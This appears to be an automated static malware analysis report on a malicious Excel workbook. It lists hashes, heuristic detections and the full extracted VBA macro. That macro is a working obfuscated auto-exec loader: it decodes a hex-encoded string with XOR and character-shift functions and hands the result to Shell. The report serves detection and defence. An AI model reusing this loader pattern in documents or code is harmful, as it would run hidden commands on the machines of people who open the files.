Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4fd1a80c550195c9…

MALICIOUS

Office (OOXML)

100.6 KB Created: 2020-02-13 22:02:14 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-07-24
MD5: 2b692512bc2f32f8956a73675e035e96 SHA-1: 2d7471c9872f7be188d84358a6ef7a3239769305 SHA-256: 4fd1a80c550195c9b5887e1044a8b9896c74efac326c540ea9c29bf4977d7fb4
320 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELL
    VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2993 bytes
SHA-256: c823f4d04ca09b808c3976aa3efb02a853f5599ed5568130f5b605d38e13efb6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Set xc = CreateObject(baba("KLLK", (DC("3D5H4:5;475E5H873H464G4942"))))
Dim uXCJFXspubIBNgsYICJXGlYCNJFXTMDHJmfZMaFWiCHKIxOXCwplfte As String
Dim JzVwRmUWCsBNvBShCRHKEeiuluCpsXRxQdWvMeoENBZnHFoWkOHoXDZ As String
Dim QuGrYcxPqYfGAwzAuQzooLHAWBLCOIXPtQRWlZQWcarvnjyLezOTfZz As String
Dim FIbVWmuBhWQiFedkUAxMOohMnYztjuYEpQhjeZOkhtJZXVsBAkOThMF As String
QuGrYcxPqYfGAwzAuQzooLHAWBLCOIXPtQRWlZQWcarvnjyLezOTfZz = baba("LK", DC("5D455E4;5;5H454;4942874;554;8D834G564G4H5G5:4445475E4642444H548E4;575D4F5:5H8D833E8E2547355;3:2;3C5;3E2H245:5:5E422D343;433642423428275G27243F5G3C254G22443C3:292343235G242;3H5E5H4F484C462C4:2728242H4:4H4;478E884H4643484F474:8D86474;5E83464G434;4:5:8D3H545H5H4;4884274;5H843E4;4;2H49474G445H87872:465D4742464F4H2C44424G868E465H5:5D9886854E45464:8846465H5H84465G4E855D475G855;4F495E45352:9E9;9;874;554;8E828H4;475C933:4G435D898E32474;5E4C44424G842G564G8D849985244G5D88254;484G4H5H8E884H46438D3H454;4942872F5D5E49474:4F5H47464484843:464G42492;55365G3H2G3F5G3D2:275H5H5D492E373G483549493723245;24273C5;3F264;29473F3H222848285;272G3:5D5:4C434F452F4H2423272:4G4H5G5:4G868H4;475C933:4G435D898E32474;5E4C44424G842G564G8D84"))
JzVwRmUWCsBNvBShCRHKEeiuluCpsXRxQdWvMeoENBZnHFoWkOHoXDZ = Replace(QuGrYcxPqYfGAwzAuQzooLHAWBLCOIXPtQRWlZQWcarvnjyLezOTfZz, "XuSEQuWCItspkGYUjXklYJNrNNVrQOeLiVSKJmJrIETptamfoFcIMND", "")
FIbVWmuBhWQiFedkUAxMOohMnYztjuYEpQhjeZOkhtJZXVsBAkOThMF = JzVwRmUWCsBNvBShCRHKEeiuluCpsXRxQdWvMeoENBZnHFoWkOHoXDZ
Shell (FIbVWmuBhWQiFedkUAxMOohMnYztjuYEpQhjeZOkhtJZXVsBAkOThMF)
End Sub
Public Function baba(fine As String, job As String) As String
        Dim lonDataPtr As Long
        Dim vbc As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(job) / 2)
            intXOrValue1 = Val("&H" & (Mid$(job, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(fine, ((lonDataPtr Mod Len(fine)) + 1), 1))
            vbc = vbc + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        baba = vbc
    End Function
    Public Function DC(ahmethakay As String)
    Dim alcakmisin As Integer, delimisin As Integer
    alcakmisin = 2
    For delimisin = 1 To Len(ahmethakay)
        Mid(ahmethakay, delimisin, 1) = Chr(Asc(Mid(ahmethakay, delimisin, 1)) - alcakmisin)
    Next delimisin
    DC = ahmethakay
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 16384 bytes
SHA-256: b60e51bbd67635c98cc53674872a554951c0881f87d0944bd411fbe5493aaefb